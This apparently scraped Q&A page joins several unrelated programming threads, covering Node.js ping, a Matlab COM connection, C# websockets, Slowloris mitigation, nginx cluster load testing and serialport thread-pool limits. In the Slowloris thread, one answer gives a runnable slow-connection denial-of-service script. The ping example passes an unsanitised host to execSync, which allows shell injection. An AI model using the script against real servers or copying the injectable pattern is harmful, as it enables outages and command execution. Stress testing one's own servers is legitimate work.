How about comrades, a few days ago I was trying to ICMP ping to an IP from NodeJS. But as is the rule in the forum, I do not come with empty hands, I have come across some posts even on this website talking about how to do this, but none of them convinces me.
One of the immovable parameters of my project is to avoid the use of NPM / Node-GYP. Therefore the option of using raw-sockets is discarded (unless you can use C ++ code in NodeJS without using things external to node itself).
Also tried (and implemented) the option of using system commands, here you can see my valid implementation for Linux and Windows (I have not tried it on Mac but I am almost sure it works)
'use strict';
import { execSync } from "child_process";
class Ping {
#stdoutToMS (stdout) {
let res;
let a = stdout.split('=');
for (let i = 0; i < a.length; i++) {
res = a[i].split("ms");
}
return ~~res[0].split('/')[0].trim();
}
ping (host, timeout = 5000) {
let mstout = timeout / 1000;
let stdout;
try {
if (process.platform === "win32") {
stdout = execSync("ping -n 1 -l 1 -w " + timeout + ' ' + host);
} else {
stdout = execSync("ping -c 1 -s 16 -W " + mstout + ' ' + host);
}
} catch (err) {
return false;
}
return this.#stdoutToMS(stdout.toString());
}
};
export default Ping;
If anyone has any ideas on how to do this natively in node without using external software, I'd be very grateful if you would tell me.
It does not appear you can access a ping equivalent from nodejs without some external code.
Since ping uses the ICMP protocol to do what it does (and it has to use that protocol because it's trying to contact an endpoint that is listening for that) and there is no implementation of the ICMP protocol in nodejs, your only option would be to create your own implementation of the ICMP protocol entirely in nodejs code by getting access to a RAW OS socket and implementing the protocol yourself. I am not aware of any built-in ability to get a RAW socket in plain nodejs (no external software).
The only examples of ICMP implementation I could find in nodejs ALL use external code to create access to a raw socket. That seems to be a verification that there is no other way to do it.
There is a module here that exposes a raw socket, but it uses some native code to implement that. You can examine its implementation to see what it's doing.
There's also this library which exposes a RAW socket from libuv to be used within nodejs, but it also uses some of it's own native code.
Related
I am trying to make a connection between Matlab and a Javascript (typescript in my case) program with a COM automation server as suggested on the MathWorks website. The docs on the website have examples for some languages created by MS, not for javascript.
I can't seem to find a lot of information on how to establish such a COM connection with JS. From what I've read, it's an old Microsoft feature that was only used with Internet Explorer.
Problem
The program I am writing is a VS Code extension, thus I am not using Internet Explorer at all. As a result, I do not believe I can use ActiveXObjects.
Question
Is there another way to establish a connection between my typescript code and the Matlab instance?
Goal
I am trying to run Matlab files from the VS Code terminal without opening a custom Matlab terminal or the complete Matlab GUI. The output should be displayed in the VS Code terminal as well. On MacOS and Linux, I can simply use the CLI tools, but due to the differences between the Windows version and MacOS/Linux versions, this is not possible on Windows.
I haven't used TypeScript very much, and what little I did, it was a long time ago when it was completely new.
However, the NPM package win32ole can be used in NodeJS, so I would assume you would be able to use it in Typescript as well (perhaps with some minor modifications to the example, or a small wrapper).
win32ole npm page
This is an example from that page, showing how to interact with Excel to create and save a worksheet.
try{
var win32ole = require('win32ole');
// var xl = new ActiveXObject('Excel.Application'); // You may write it as:
var xl = win32ole.client.Dispatch('Excel.Application');
xl.Visible = true;
var book = xl.Workbooks.Add();
var sheet = book.Worksheets(1);
try{
sheet.Name = 'sheetnameA utf8';
sheet.Cells(1, 2).Value = 'test utf8';
var rg = sheet.Range(sheet.Cells(2, 2), sheet.Cells(4, 4));
rg.RowHeight = 5.18;
rg.ColumnWidth = 0.58;
rg.Interior.ColorIndex = 6; // Yellow
var result = book.SaveAs('testfileutf8.xls');
console.log(result);
}catch(e){
console.log('(exception cached)\n' + e);
}
xl.ScreenUpdating = true;
xl.Workbooks.Close();
xl.Quit();
}catch(e){
console.log('*** exception cached ***\n' + e);
}
Scenario
C# Based Server
JavaScript Based Client
Situation
I created this fairly simple "server" which only job is to help me understanding how to actually use those websockets in a C# environment.
using (var server = new HttpListener())
{
server.Prefixes.Add("http://localhost:8080/");
server.Start();
while(true)
{
var context = server.GetContext();
if (context.Request.IsWebSocketRequest)
{
var cntxt = context.AcceptWebSocketAsync(null).ConfigureAwait(true).GetAwaiter().GetResult();
var buff = new byte[2048];
while(cntxt.WebSocket.State == System.Net.WebSockets.WebSocketState.Open || cntxt.WebSocket.State == System.Net.WebSockets.WebSocketState.Connecting)
{
cntxt.WebSocket.ReceiveAsync(new ArraySegment<byte>(buff), CancellationToken.None).ConfigureAwait(true).GetAwaiter().GetResult();
Console.WriteLine(Encoding.UTF8.GetString(buff));
}
}
else
{
context.Response.StatusCode = (int)HttpStatusCode.BadRequest;
using (var writer = new StreamWriter(context.Response.OutputStream))
{
writer.Write("<html><body>WEBSOCKET ONLY!</body></html>");
}
}
}
}
The problem now is: when i try to add the websocket prefix via server.Prefixes.Add("ws://localhost:8080"), i get some System.ArgumentException thrown which tells my i can only add http and https as accepted protocol.
Thing is: doing it and using ws = new WebSocket('ws://localhost:8080'); (JavaScript) to connect to a websocket, yields for obvious reasons nothing.
Changing the prefix to HTTP in the JS websocket, will provide me with yet another sort-off argument exception.
Actual Question
how to actually get the HttpListener to acceppt web socket requests?
Further Info
Used .net framework is 4.6.1
Browser to test this was Google Chrome 69.0.3497.100
The reason for why the above was not working ... is due to the JS websocket requiring a path.
Changing the above HttpListener prefix to eg. "http://localhost:8080/asdasd/" will allow the socket to connect propertly.
Update
_ https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/ _.
Update Friday, 13th 2018:
I managed to convince the Node.js core team about setting a CVE for that.
The fix — new defaults and probably new API — will be there in 1 or 2 weeks.
Mitigate means to quiet an attack.
Everybody knows Slowloris:
HTTP Header or POST Data characters get transmitted slowly to block the socket.
Scaled that makes a much easier DoS attack.
**In NGINX the mitigation is inbuilt:**
> Closing Slow Connections
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
Since there is no inbuilt way to work on the header in the HTTP Server in Node.js.
I came to the question, if I can combine net and a HTTP Server for mitigating Slowloris .
The idea to `destroy` the `connection` in case of `Slowloris` is this.
http.createServer(function(req, res) {
var timeout;
net.on('data', function(chunk) {
clearTimeout(timeout);
timeout = setTimeout(function() {
req.connection.destroy();
}, 100);
};
};
The problem I can see is, both services have to listen on the same Socket on Port 80 and 443.
Do — not — know how to tackle this.
It is possible to transfer requests and responses from net to HTTP-Server and back.
But this takes 2 sockets for 1 incoming message.
And 2 sockets for 1 outgoing message.
So this is — not — feasible in sense of high available server.
I have no clue.
What can the world do to get rid of this scourge?
CVE for Apache Tomcat.
This is a serious security threat.
I think this want to be solved on C or C++ base.
I cannot write these real programmer languages.
But all of us are helped, if somebody pushes this on Github.
Because the community there once deleted my thread about mitigating Slowloris.
The best way to mitigate this issue, as well as a number of other issues, is to place a proxy layer such as nginx or a firewall between the node.js application and the internet.
If you're familiar with the paradigms behind many design and programming approached, such as OOP, you will probably recognize the importance behind "separation of concerns".
The same paradigm holds true when designing the infrastructure or the way clients can access data.
The application should have only one concern: handle data operations (CRUD). This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc').
Other concerns should be placed in a separate layer, such as an nginx proxy layer.
For example, nginx will often be concerned with routing traffic to your application / load balancing. This will include security concerns related to network connections, such as SSL/TLS negotiations, slow clients, etc'.
An extra firewall might (read: should) be implemented to handle additional security concerns.
The solution for your issue is simple, do not directly expose the node.js application to the internet, use a proxy layer - it exists for a reason.
I think you're taking a wrong approach for this vulnerability.
This doesn't deal with DDOS attack (Distributed Denial of Service) where many IPs are used, and when you need to continue serving some machines that are inside the same firewall as machines involved in the attack.
Often machines used in DDOS aren't real machines that have been taken over (maybe vitualized or with software to do it from different IPs).
When a DDOS against a large target starts, per-IP throttling may ban all machines from the same fire-walled LAN.
To continue providing service in the face of a DDOS, you really need to block requests based on common elements of the request itself, not just IP. security.se may be the best forum for specific advice on how to do that.
Unfortunately, DOS attacks, unlike XSRF, don't need to originate from real browsers so any headers that don't contain closely-held and unguessable nonces can be spoofed.
The recommendation: To prevent this issue, you had to have a good firewall policies against DDos attacks and massive denial services.
BUT! If you want to do something to test a Denial service with node.js, you can use this code (use only for test purposes, not for a production environment)
var net = require('net');
var maxConnections = 30;
var connections = [];
var host = "127.0.0.1";
var port = 80;
function Connection(h, p)
{
this.state = 'active';
this.t = Date.now();
this.client = net.connect({port:p, host:h}, () => {
process.stdout.write("Connected, Sending... ");
this.client.write("POST / HTTP/1.1\r\nHost: "+host+"\r\n" +
"Content-Type: application/x-www-form-urlenconded\r\n" +
"Content-Length: 385\r\n\r\nvx=321&d1=fire&l");
process.stdout.write("Written.\n");
});
this.client.on('data', (data) => {
console.log("\t-Received "+data.length+" bytes...");
this.client.end();
});
this.client.on('end', () => {
var d = Date.now() - this.t;
this.state = 'ended';
console.log("\t-Disconnected (duration: " +
(d/1000).toFixed(3) +
" seconds, remaining open: " +
connections.length +
").");
});
this.client.on('error', () => {
this.state = 'error';
});
connections.push(this);
}
setInterval(() => {
var notify = false;
// Add another connection if we haven't reached
// our max:
if(connections.length < maxConnections)
{
new Connection(host, port);
notify = true;
}
// Remove dead connections
connections = connections.filter(function(v) {
return v.state=='active';
});
if(notify)
{
console.log("Active connections: " + connections.length +
" / " + maxConnections);
}
}, 500);
It is as easy as this.
var http = require('http');
var server = http.createServer(function(req,res) {
res.send('Now.')
})
server.setTimeout(10);
server.listen(80, '127.0.0.1');
server.setTimeout([msecs][, callback])
By default, the Server's timeout value is 2 minutes, and sockets are
destroyed automatically if they time out.
https://nodejs.org/api/http.html#http_server_settimeout_msecs_callback
Tested with.
var net = require('net');
var client = new net.Socket();
client.connect(80, '127.0.0.1', function() {
setInterval(function() {
client.write('Hello World.');
},10000)
});
This is only the second to best solution.
Since legit connections are terminated also.
I'm transforming my application to node.js cluster which I hope it would boost the performance of my application.
Currently, I'm deploying the application to 2 EC2 t2.medium instances. I have Nginx as a proxy and ELB.
This is my express cluster application which is pretty standard from the documentation.
var bodyParser = require('body-parser');
var cors = require('cors');
var cluster = require('cluster');
var debug = require('debug')('expressapp');
if(cluster.isMaster) {
var numWorkers = require('os').cpus().length;
debug('Master cluster setting up ' + numWorkers + ' workers');
for(var i = 0; i < numWorkers; i++) {
cluster.fork();
}
cluster.on('online', function(worker) {
debug('Worker ' + worker.process.pid + ' is online');
});
cluster.on('exit', function(worker, code, signal) {
debug('Worker ' + worker.process.pid + ' died with code: ' + code + ', and signal: ' + signal);
debug('Starting a new worker');
cluster.fork();
});
} else {
// Express stuff
}
This is my Nginx configuration.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '1024'
nginx::keepalive_timeout: '65'
I have 2 CPUs on Nginx server.
This is my before performance.
I get 1,500 request/s which is pretty good. Now I thought I would increase the number of connections on Nginx so I can accept more requests. I do this.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '2048'
nginx::keepalive_timeout: '65'
And this is my after performance.
Which I think it's worse than before.
I use gatling for performance testing and here's the code.
import io.gatling.core.Predef._
import io.gatling.http.Predef._
import scala.concurrent.duration._
class LoadTestSparrowCapture extends Simulation {
val httpConf = http
.baseURL("http://ELB")
.acceptHeader("application/json")
.doNotTrackHeader("1")
.acceptLanguageHeader("en-US,en;q=0.5")
.acceptEncodingHeader("gzip, defalt")
.userAgentHeader("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0")
val headers_10 = Map("Content-Type" -> "application/json")
val scn = scenario("Load Test")
.exec(http("request_1")
.get("/track"))
setUp(
scn.inject(
atOnceUsers(15000)
).protocols(httpConf))
}
I deployed this to my gatling cluster. So, I have 3 EC2 instances firing 15,000 requests in 30s to my application.
The question is, is there anything I can do to increase my performance of my application or I just need to add more machines?
The route that I'm testing is pretty simple, I get the request and send it off to RabbitMQ so it can be processed further. So, the response of that route is pretty fast.
You've mentioned that you are using AWS and in the front of your EC2 instances in ELB. As I see you are getting 502 and 503 status codes. These can be sent from ELB or your EC2 instances. Make sure that when doing the load-test you know from where the errors are coming from. You can check this in AWS console in ELB CloudWatch metrics.
Basically HTTPCode_ELB_5XX means your ELB sent 50x. On other hand HTTPCode_Backend_5XX sent 50x. You can also verify that in the logs of ELB. Better explanation of errors of ELB you can find here.
To load-test on AWS you should definitely read this. Point is that ELB is just another set of machines, which needs to scale if your load increases. Default scaling strategy is (cited from the section "Ramping Up Testing"):
Once you have a testing tool in place, you will need to define the growth in the load. We recommend that you increase the load at a rate of no more than 50 percent every five minutes.
That means when you start at some number of concurrent users, lets say 1000, per default you should increase only up to 1500 within 5 minutes. This will guarantee that ELB will scale with load on your servers. Exact numbers may vary and you have to test them on your own. Last time I've tested it sustained load of 1200 req./s w/o an issue and then I've started to receive 50x. You can test it easily running ramp-up scenario from X to Y users from single client and waiting for 50x.
Next very important thing (from part "DNS Resoultion") is:
If clients do not re-resolve the DNS at least once per minute, then the new resources Elastic Load Balancing adds to DNS will not be used by clients.
In short it means that you have to guarantee that TTL in DNS is respected, or that your clients re-resolve and rotate DNS IPs which they received by doing DNS lookup to guarantee round-robin fashion to distributing load. If not (e.g. testing from only one client, not your case) you can skew the results by overloading one instance of ELB by targeting all the traffic only to one instance. That means ELB will not scale at all.
Hope it will help.
I've been experimenting with node-serialport library to access devices connected to a USB hub and send/receive data to these devices. The code works fine on linux but on windows(windows 8.1 and windows 7) I get some odd behaviour. It doesn't seem to work for more than 2 devices, it just hangs when writing to the port. The callback for write method never gets called. I'm not sure how to go about debugging this issue. I'm not a windows person, if someone can give me some directions it would be great.
Below is the code I'm currently using to test.
/*
Sample code to debug node-serialport library on windows
*/
//var SerialPort = require("./build/Debug/serialport");
var s = require("./serialport-logger");
var parsers = require('./parsers');
var ee = require('events');
s.list(function(err, ports) {
console.log("Number of ports available: " + ports.length);
ports.forEach(function(port) {
var cName = port.comName,
sp;
//console.log(cName);
sp = new s.SerialPort(cName, {
parser: s.parsers.readline("\r\n")
}, false);
// sp.once('data', function(data) {
// if (data) {
// console.log("Retrieved data " + data);
// //console.log(data);
// }
// });
//console.log("Is port open " + sp.isOpen());
if(!sp.isOpen()) {
sp.open(function(err) {
if(err) {
console.log("Port cannot be opened manually");
} else {
console.log("Port is open " + cName);
sp.write("LED=2\r\n", function(err) {
if (err) {
console.log("Cannot write to port");
console.error(err);
} else {
console.log("Written to port " + cName);
}
});
}
});
}
//sp.close();
});
});
I'm sure you'd have noticed I'm not require'ing serialport library instead I'm using serialport-logger library it's just a way to use the serialport addons which are compiled with debug switch on windows box.
TLDR; For me it works by increasing the threadpool size for libuv.
$ UV_THREADPOOL_SIZE=20 && node server.js
I was fine with opening/closing port for each command for a while but a feature request I'm working on now needs to keep the port open and reuse the connection to run the commands. So I had to find an answer for this issue.
The number of devices I could support by opening a connection and holding on to it is 3. The issue happens to be the default threadpool size of 4. I already have another background worker occupying 1 thread so I have only 3 threads left. The EIO_WatchPort function in node-serialport runs as a background worker which results in blocking a thread. So when I use more than 3 devices the "open" method call is waiting in the queue to be pushed to the background worker but since they are all busy it blocks node. Then any subsequent requests cannot be handled by node. Finally increasing the thread pool size did the trick, it's working fine now. It might help someone. Also this thread definitely helped me.
As opensourcegeek pointed all u need to do is to set UV_THREADPOOL_SIZE variable above default 4 threads.
I had problems at my project with node.js and modbus-rtu or modbus-serial library when I tried to query more tan 3 RS-485 devices on USB ports. 3 devices, no problem, 4th or more and permanent timeouts. Those devices responded in 600 ms interval each, but when pool was busy they never get response back.
So on Windows simply put in your node.js environment command line:
set UV_THREADPOOL_SIZE=8
or whatever u like till 128. I had 6 USB ports queried so I used 8.